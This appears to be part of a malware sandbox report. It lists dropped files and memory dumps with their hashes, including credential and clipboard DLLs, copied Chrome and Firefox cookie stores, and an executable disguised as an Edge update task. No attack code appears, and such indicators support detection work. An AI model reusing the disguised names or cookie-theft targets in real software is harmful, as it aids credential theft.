1aef2244854dda50347b4077b914d91d5a0152447097220688affa3dc7efb309

SHA512
3eab111fbc6b8ffbe81ffad48e5cbc765ab9b3fddf7a988fe01048e93d910293df50986232132ceabb0953878fc7bd1f899c13f66d3d3a24ec943fe4c7b19e62

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsiAC6.tmp\yaybccuz.dll

Filesize
104KB

MD5
1ae523497be11c3d1bf27532733d7d4a

SHA1
84fe6e87fe3765fdba155f19dd4bfa14cc019bc5

SHA256
37f7013f02d3f257bec64c462e1df4a0c2c2e037f08770fa6f4d060f3e931b94

SHA512
06b2147ebd1febdc3abed79d5c030dff49326fb6d1639a5df5f177aa2ad7642b9b25d11fbd5aa2aa36f02b1c7c30d2841d7e0bbfb6b1f117835e309dee411209

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsoA63F.tmp\System.dll

Filesize
11KB

MD5
3f176d1ee13b0d7d6bd92e1c7a0b9bae

SHA1
fe582246792774c2c9dd15639ffa0aca90d6fd0b

SHA256
fa4ab1d6f79fd677433a31ada7806373a789d34328da46ccb0449bbf347bd73e

SHA512
0a69124819b7568d0dea4e9e85ce8fe61c7ba697c934e3a95e2dcfb9f252b1d9da7faf8774b6e8efd614885507acc94987733eba09a2f5e7098b774dfc8524b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss8E28.tmp\icjafufptn.dll

Filesize
82KB

MD5
d581d9ae5e58c5992a82604c03758014

SHA1
55c5bc6b497b4a6d9ed96fe2c01f78ddecd12320

SHA256
ffb2cc135d3ea2cb2e989002a9afefa8812ec4f9b31b8fd177aa71058af48227

SHA512
f6b8ed04d6e1f126aff5806b9f8783c4079dc575133829d1c524af75d0814066c8aeb57efc1bf31c387a56c7747d4c38b8303cae43040c38c4ecada2b1f84cd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsyDC48.tmp\plbwit.dll

Filesize
86KB

MD5
5b857d95b618168a8ce018f5c4bf5c4b

SHA1
fc7cd742b7dd0110dcd5f5e6f96e637a69b7fd76

SHA256
b801b45414145ceb0e147dc9546fa2e53f39151cd4859599d01b9f6736ad749f

SHA512
6d1c928a93fe80a2859bc5587d8bc9eb6b4789a8730722f22138bb0b5e234287f0b2e84b6f7e5317a2c95ca94e058b05fd3734dadc57c09acf46a2ff0d89a29d

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5068_124074854\tmpF017.tmp

Filesize
207KB

MD5
e69fc41ec787b0eab6982792170c32b8

SHA1
6d427cc02b03e47d891f75e7ce80c1a364c4402c

SHA256
89ba90b3ab2b9031e1afd099db5e8506bcf13d7ab6740366246b06aa1bf2fa7b

SHA512
05c62b58ad7de172803e3fc881af5ba76ebe75ae03e9bdcb76d20094652775c6fbf9ec1fd5a726ec9c73c815d23adacee096965202ae72680b471fcb87e4cd2e

Download Submit
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll

Filesize
162B

MD5
1b7c22a214949975556626d7217e9a39

SHA1
d01c97e2944166ed23e47e4a62ff471ab8fa031f

SHA256
340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87

SHA512
ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

Download Submit
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll

Filesize
1.0MB

MD5
16fd83a682162d6edc119dc12c9990dc

SHA1
4b5f38c78c8e5f1333989da0912e945335f82c95

SHA256
36be2f6cccdf3edc709e7dabcbe529d4f6390d3c624ba10fb471bd05d36060c8

SHA512
5af414c95db738d0a65fdd67f2ff3923c451ee68856237f55626586aac14efe62288f5b8d74a5fbf2eaba9e6a1689cea89b856212a597ab12a3a4b0097e3f3a5

Download Submit
C:\Users\Admin\AppData\Roaming\0cw2yomy.dc0\Chrome\Default\Network\Cookies

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Roaming\6qddFkh.tmp

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe

Filesize
294KB

MD5
62e48038a1105d8445b0f539b250a2ad

SHA1
f592671e524814bb585b61ecf3c6fea16c724ae8

SHA256
0b34d688a6c36cf55e1c18d22523f62a7fba025cc2035e0c163abd50288ae539

SHA512
3a8874013fa64019b80788d0f32054e59ee56ef8e25188a51026d562212473c6961b7be46eddda11d3babeeb463656ea7c43f48298cde8184a59373ef38a9393

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe

Filesize
294KB

MD5
62e48038a1105d8445b0f539b250a2ad

SHA1
f592671e524814bb585b61ecf3c6fea16c724ae8

SHA256
0b34d688a6c36cf55e1c18d22523f62a7fba025cc2035e0c163abd50288ae539

SHA512
3a8874013fa64019b80788d0f32054e59ee56ef8e25188a51026d562212473c6961b7be46eddda11d3babeeb463656ea7c43f48298cde8184a59373ef38a9393

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe

Filesize
294KB

MD5
62e48038a1105d8445b0f539b250a2ad

SHA1
f592671e524814bb585b61ecf3c6fea16c724ae8

SHA256
0b34d688a6c36cf55e1c18d22523f62a7fba025cc2035e0c163abd50288ae539

SHA512
3a8874013fa64019b80788d0f32054e59ee56ef8e25188a51026d562212473c6961b7be46eddda11d3babeeb463656ea7c43f48298cde8184a59373ef38a9393

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe

Filesize
294KB

MD5
62e48038a1105d8445b0f539b250a2ad

SHA1
f592671e524814bb585b61ecf3c6fea16c724ae8

SHA256
0b34d688a6c36cf55e1c18d22523f62a7fba025cc2035e0c163abd50288ae539

SHA512
3a8874013fa64019b80788d0f32054e59ee56ef8e25188a51026d562212473c6961b7be46eddda11d3babeeb463656ea7c43f48298cde8184a59373ef38a9393

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe

Filesize
84.8MB

MD5
127c39addfb947fcae5adbd463af0e47

SHA1
4e8a9b49fff4432ab40a2bbc1eb1bc1e164aec17

SHA256
f1d0420d0bc14d6a41f711cb55bce957919ba9d705e29740238f2407561af7b2

SHA512
cd682045222b20b96e5ac77b25002ef9eaf04f8a5667280ac0fe4348945b2c299b83ae03de1b0d000a386d6a0eb97a6b6cf282f81a75a9eb3f1c604adb0d5e71

Download Submit
C:\Users\Admin\AppData\Roaming\ctbviwe

Filesize
274KB

MD5
1f95b8c2dc09a84f6a9fe6f74dbf7d96

SHA1
35f2c55596e43c2887d70a172d452fc5ac36835d

SHA256
9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330

SHA512
7d7bf42a7df0ec4dcf0f8ac891bee60871ddc45c9887d8b5022dcddc27fae7afdd2134370f1a5ac898c364c5d702e9fb84b496d7c8a253fefd96d65715ba563c

Download Submit
C:\Users\Admin\AppData\Roaming\pjqnw2fd.z2j\Firefox\Profiles\p4wuoroe.default-release\cookies.sqlite

Filesize
96KB

MD5
d367ddfda80fdcf578726bc3b0bc3e3c

SHA1
23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

SHA256
0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

SHA512
40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

Download Submit
C:\Users\Public\WindowsApp1.exe

Filesize
112KB

MD5
23d5e4451d06e75a3096a65250bad00b

SHA1
aed599efd69fdb9985c0e60558514e6c451fe329

SHA256
a3551ac295e91fd27d9e8bdb341452bc2aca9a6f9235bd3c4de7e2acf8ea775e

SHA512
d4a41e7a3c2e62ab84af308092dd8a86121908bb87cf510b2b1d91e70726d80666eb26b9407c20c48260999be1c647cdb2bcf8abe9a204e6f1fa762c75bf669d

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
memory/192-370-0x0000000010000000-0x000000001034B000-memory.dmp

Filesize
3.3MB

Download
memory/192-367-0x0000000010000000-0x000000001034B000-memory.dmp

Filesize
3.3MB

Download
memory/192-371-0x0000000010000000-0x000000001034B000-memory.dmp

Filesize
3.3MB

Download
memory/192-372-0x0000000010000000-0x000000001034B000-memory.dmp

Filesize
3.3MB

Download
memory/224-308-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/720-329-0x0000000010000000-0x000000001034B000-memory.dmp

Filesize
3.3MB

Download
memory/720-326-0x0000000010000000-0x000000001034B000-memory.dmp

Filesize
3.3MB

Download
memory/720-311-0x0000000010000000-0x000000001034B000-memory.dmp

Filesize
3.3MB

Download
memory/768-252-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/768-219-0x0000000000B50000-0x0000000000B60000-memory.dmp

Filesize
64KB

Download
memory/768-203-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/768-213-0x0000000001190000-0x00000000014B0000-memory.dmp

Filesize
3.1MB

Download
memory/768-193-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/768-208-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/1300-163-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1300-187-0x0000000005570000-0x0000000005580000-memory.dmp

Filesize
64KB

Download
memory/1324-158-0x000001CDBE890000-0x000001CDBE904000-memory.dmp

Filesize
464KB

Download
memory/1352-190-0x0000022934460000-0x000002293450C000-memory.dmp

Filesize
688KB

Download
memory/1384-146-0x0000026BC6BF0000-0x0000026BC6BFA000-memory.dmp

Filesize
40KB

Download
memory/1384-141-0x0000026BC6800000-0x0000026BC68C2000-memory.dmp

Filesize
776KB

Download
memory/1692-230-0x000001ADB42C0000-0x000001ADB430A000-memory.dmp

Filesize
296KB

Download
memory/1836-220-0x000000001B7A0000-0x000000001B85B000-memory.dmp

Filesize
748KB

Download
memory/1836-223-0x000000001BB60000-0x000000001BC7E000-memory.dmp

Filesize
1.1MB

Download
memory/1836-306-0x000000001AF60000-0x000000001AF70000-memory.dmp

Filesize
64KB

Download
memory/1836-335-0x00000000204B0000-0x000000002058B000-memory.dmp

Filesize
876KB

Download
memory/1836-337-0x00000000203F0000-0x00000000204A3000-memory.dmp

Filesize
716KB

Download
memory/1836-121-0x0000000000360000-0x0000000000368000-memory.dmp

Filesize
32KB

Download
memory/1836-240-0x000000001BC80000-0x000000001BD85000-memory.dmp

Filesize
1.0MB

Download
memory/1836-122-0x000000001AF60000-0x000000001AF70000-memory.dmp

Filesize
64KB

Download
memory/2228-325-0x000002D7499A0000-0x000002D7499F2000-memory.dmp

Filesize
328KB

Download
memory/2228-340-0x000002D7499A0000-0x000002D7499F2000-memory.dmp

Filesize
328KB

Download
memory/2416-180-0x0000000005330000-0x0000000005340000-memory.dmp

Filesize
64KB

Download
memory/2416-183-0x0000000005080000-0x000000000508A000-memory.dmp

Filesize
40KB

Download
memory/2416-169-0x00000000050B0000-0x0000000005142000-memory.dmp

Filesize
584KB

Download
memory/2416-280-0x0000000007B50000-0x0000000007B72000-memory.dmp

Filesize
136KB

Download
memory/2416-275-0x0000000007A90000-0x0000000007B22000-memory.dmp

Filesize
584KB

Download
memory/2416-242-0x0000000006E70000-0x0000000006E9C000-memory.dmp

Filesize
176KB

Download
memory/2416-153-0x0000000000610000-0x0000000000718000-memory.dmp

Filesize
1.0MB

Download
memory/2416-288-0x0000000007B80000-0x0000000007ED0000-memory.dmp

Filesize
3.3MB

Download
memory/2416-233-0x0000000007790000-0x00000000078A0000-memory.dmp

Filesize
1.1MB

Download
memory/2416-161-0x00000000054D0000-0x00000000059CE000-memory.dmp

Filesize
5.0MB

Download
memory/2660-327-0x0000000001A50000-0x0000000001D70000-memory.dmp

Filesize
3.1MB

Download
memory/2864-292-0x00000000013A0000-0x0000000001564000-memory.dmp

Filesize
1.8MB

Download
memory/2864-341-0x0000000000E90000-0x00000000011D6000-memory.dmp

Filesize
3.3MB

Download
memory/3328-296-0x00000274791E0000-0x00000274791F0000-memory.dmp

Filesize
64KB

Download
memory/3328-291-0x0000027476970000-0x00000274769C6000-memory.dmp

Filesize
344KB

Download
memory/3328-293-0x0000027476CF0000-0x0000027476D36000-memory.dmp

Filesize
280KB

Download
memory/3436-323-0x00000000056C0000-0x00000000056D0000-memory.dmp

Filesize
64KB

Download
memory/3436-232-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3640-314-0x00000000000D0000-0x000000000096C000-memory.dmp

Filesize
8.6MB

Download
memory/3676-166-0x0000000000DC0000-0x0000000000DCA000-memory.dmp

Filesize
40KB

Download
memory/3676-215-0x0000000005550000-0x0000000005560000-memory.dmp

Filesize
64KB

Download
memory/3892-149-0x00000000002C0000-0x00000000002F4000-memory.dmp

Filesize
208KB

Download
memory/3892-199-0x0000000004AB0000-0x0000000004AC0000-memory.dmp

Filesize
64KB

Download
memory/4140-221-0x0000000005850000-0x0000000005860000-memory.dmp

Filesize
64KB

Download
memory/4324-182-0x0000024C4B000000-0x0000024C4B054000-memory.dmp

Filesize
336KB

Download
memory/4496-289-0x0000000000030000-0x000000000046F000-memory.dmp

Filesize
4.2MB

Download
memory/4496-279-0x0000000000030000-0x000000000046F000-memory.dmp

Filesize
4.2MB

Download
memory/4496-295-0x0000000003050000-0x000000000307D000-memory.dmp

Filesize
180KB

Download
memory/4496-269-0x0000000000030000-0x000000000046F000-memory.dmp

Filesize
4.2MB

Download
memory/4496-315-0x0000000003050000-0x000000000307D000-memory.dmp

Filesize
180KB

Download
memory/4496-320-0x0000000004A60000-0x0000000004D80000-memory.dmp

Filesize
3.1MB

Download
memory/4700-202-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/4700-214-0x0000000000F80000-0x00000000012A0000-memory.dmp

Filesize
3.1MB

Download
memory/4700-222-0x00000000007F0000-0x0000000000800000-memory.dmp

Filesize
64KB

Download
memory/4700-257-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/4700-191-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/4700-209-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/4732-148-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4732-212-0x00000000056C0000-0x00000000056D0000-memory.dmp

Filesize
64KB

Download
memory/4732-172-0x00000000054D0000-0x000000000556C000-memory.dmp

Filesize
624KB

Download
memory/4732-196-0x00000000054A0000-0x00000000054AA000-memory.dmp

Filesize
40KB

Download
memory/4732-184-0x00000000056C0000-0x00000000056D0000-memory.dmp

Filesize
64KB

Download
memory/4732-200-0x0000000005790000-0x000000000579A000-memory.dmp

Filesize
40KB

Download
memory/4732-198-0x00000000054B0000-0x00000000054CE000-memory.dmp

Filesize
120KB

Download
memory/4868-256-0x0000000001390000-0x000000000139B000-memory.dmp

Filesize
44KB

Download
memory/4868-262-0x0000000001390000-0x000000000139B000-memory.dmp

Filesize
44KB

Download
memory/4868-273-0x0000000000490000-0x00000000004BD000-memory.dmp

Filesize
180KB

Download
memory/4868-282-0x0000000000490000-0x00000000004BD000-memory.dmp

Filesize
180KB

Download
memory/4868-278-0x0000000000BB0000-0x0000000000ED0000-memory.dmp

Filesize
3.1MB

Download
memory/4868-258-0x0000000001390000-0x000000000139B000-memory.dmp

Filesize
44KB

Download
memory/4908-324-0x00000000000B0000-0x00000000000C8000-memory.dmp

Filesize
96KB

Download
memory/4956-178-0x000001F536310000-0x000001F536384000-memory.dmp

Filesize
464KB

Download
memory/4956-145-0x000001F5368E0000-0x000001F536E06000-memory.dmp

Filesize
5.1MB

Download
memory/4956-133-0x000001F51BE10000-0x000001F51BE1A000-memory.dmp

Filesize
40KB

Download
memory/4956-156-0x000001F536300000-0x000001F536310000-memory.dmp

Filesize
64KB

Download
memory/4984-254-0x00000000008E0000-0x0000000000907000-memory.dmp

Filesize
156KB

Download
memory/4984-260-0x00000000008E0000-0x0000000000907000-memory.dmp

Filesize
156KB

Download
memory/4984-276-0x00000000049F0000-0x0000000004D10000-memory.dmp

Filesize
3.1MB

Download
memory/4984-253-0x00000000008E0000-0x0000000000907000-memory.dmp

Filesize
156KB

Download
memory/4984-268-0x00000000008A0000-0x00000000008CD000-memory.dmp

Filesize
180KB

Download
memory/5028-237-0x0000000001630000-0x0000000001950000-memory.dmp

Filesize
3.1MB

Download
memory/5028-210-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5028-239-0x0000000001080000-0x0000000001090000-memory.dmp

Filesize
64KB

Download
memory/5028-270-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5028-225-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download